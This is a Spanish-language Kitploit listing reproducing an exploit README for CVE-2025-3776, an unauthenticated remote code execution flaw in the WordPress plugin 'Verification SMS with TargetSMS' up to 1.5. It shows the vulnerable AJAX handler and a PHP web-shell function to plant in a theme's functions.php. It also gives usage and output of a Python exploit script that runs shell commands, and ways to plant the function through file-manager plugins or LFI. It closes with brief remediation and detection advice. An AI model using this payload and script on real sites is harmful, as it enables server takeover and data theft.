Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-3776 — El plugin Verification SMS with TargetSMS de WordPress <= 1.5 es vulnerable a Ejecución Remota de Código (RCE). | Kitploit
Herramientas/GitHubGitHub/nxploited/cve-2025-3776
Análisis de VulnerabilidadesAnálisis de CódigoExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y Educación
GitHubnxploited/cve-2025-3776

CVE-2025-3776

El plugin Verification SMS with TargetSMS de WordPress <= 1.5 es vulnerable a Ejecución Remota de Código (RCE).

Ver Repositorio
711hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2025-3776 - Ejecución Remota de Código en el Plugin "Verification SMS with TargetSMS" <= 1.5

Información del Plugin

  • Nombre del Plugin: Verification SMS with TargetSMS
  • Versiones Vulnerables: <= 1.5
  • ID CVE: CVE-2025-3776
  • Tipo: Ejecución Remota de Código (RCE)
  • Clasificación OWASP: A1: Inyección
  • Severidad CVSS: 10.0 (Crítica)
  • Privilegios Requeridos: No autenticado
  • Fecha de Publicación: 23 de abril de 2025

Causa Raíz: Error de Programación

La vulnerabilidad se origina por el uso de call_user_func() sobre entrada controlada por el usuario sin sanearla contra una lista blanca de funciones permitidas. Esto crea una falla lógica donde cualquier función PHP existente en memoria puede ejecutarse sin autenticación, lo que deriva en una condición grave de Ejecución Remota de Código (RCE).

Ubicación del Código Vulnerable

Archivo: /inc/ajax.php

root@kitploit:~
add_action('wp_ajax_nopriv_targetvrHHndler', 'targetvr_ajax_handler');

function targetvr_ajax_handler(){
    $callback = targetvr_get_postData('callback', 'string');

    if ($callback and function_exists($callback)){
        call_user_func($callback);
    } else {
        targetvr_return_json(false);
    }

    wp_die();
}

Este código permite a usuarios no autenticados invocar cualquier función existente en memoria, incluidas funciones maliciosas si el atacante puede cargarlas.


Cómo Probar Esta Vulnerabilidad

✅ Requisitos Previos

Para explotar esta vulnerabilidad con éxito, debe existir una función invocable en el entorno de WordPress. Dado que los plugins y temas de WordPress pueden cargar funciones automáticamente, el atacante puede inyectar su propia función a través del archivo functions.php del tema activo.

📍 Archivo a Modificar:

root@kitploit:~
target.com/wp-content/themes/twentytwentyfour/functions.php

🛠️ Inyecta el siguiente payload al final de functions.php:

root@kitploit:~
function evil() {
    if (isset($_GET['cmd'])) {
        echo '<pre>' . shell_exec($_GET['cmd']) . '</pre>';
    } else {
        echo '<pre>' . shell_exec("whoami") . '</pre>';
    }
    exit;
}

✅ Esto garantiza que la función evil() se cargue en memoria y pueda ejecutarse mediante call_user_func().


Pasos de Explotación Usando el Script de Python

✅ Uso:

root@kitploit:~
python3 CVE-2025-3776.py -u http://target.com -c "id"

✅ Ejemplo de Salida:

root@kitploit:~
[*] Checking plugin version...
[+] Plugin version detected: 1.5
[+] Plugin is vulnerable. Proceeding with exploitation...
[*] Sending exploit request...
[+] Exploit succeeded!
<pre>uid=1(daemon) gid=1(daemon) groups=1(daemon)</pre>

Exploit By : Nxploited ( Khaled Alenazi )

Menú de Ayuda del Script de Python:

root@kitploit:~
usage: CVE-2025-3776.py [-h] -u URL [-c CMD]

CVE-2025-3776 Exploit for TargetSMS Plugin <= 1.5

# Exploit by Nxploited ( Khaled Alenazi )

options:
  -h, --help     show this help message and exit
  -u, --url URL  Target WordPress site URL
  -c, --cmd CMD  Command to execute (default: whoami)

Comportamiento Sin Inyección

Si no hay una función evil() o similar disponible en memoria:

  • La solicitud dará como resultado:
root@kitploit:~
{"status":false}
  • Esto significa que la función de devolución de llamada no existe y el exploit falla de forma segura.

Rutas de Explotación en el Mundo Real

  • Inyección en el Archivo del Tema: Modifica el archivo functions.php del tema activo (como se demostró).
  • A través de Plugins de Administrador de Archivos: Usa cualquier plugin como WP File Manager para subir un archivo PHP que contenga evil().
  • A través de LFI o fallos de inclusión: Usa una Inclusión Local de Archivos (LFI) existente para incluir un archivo subido que contenga una función maliciosa.

Riesgo e Impacto

Una vez cargada una función maliciosa, un atacante no autenticado puede:

  • Ejecutar comandos arbitrarios de shell
  • Ver archivos sensibles del servidor
  • Avanzar hacia el compromiso total del sitio o del servidor

Recomendación

  • Deshabilitar o eliminar inmediatamente el plugin si se ejecuta la versión <= 1.5
  • Restringir el acceso a la edición de archivos mediante wp-admin
  • Parchear o reemplazar el plugin con alternativas seguras

Detección

Busca solicitudes POST repetidas hacia:

root@kitploit:~
/wp-admin/admin-ajax.php?action=targetvrHHndler

Con callback=evil o cualquier nombre de función inesperado


Aviso Legal

Esta información se proporciona únicamente con fines educativos y de investigación ética. El autor no es responsable del mal uso o los daños causados por el uso de esta información.


Atribución del Exploit

Exploit por: Nxploited (Khaled Alenazi)

Descargar herramienta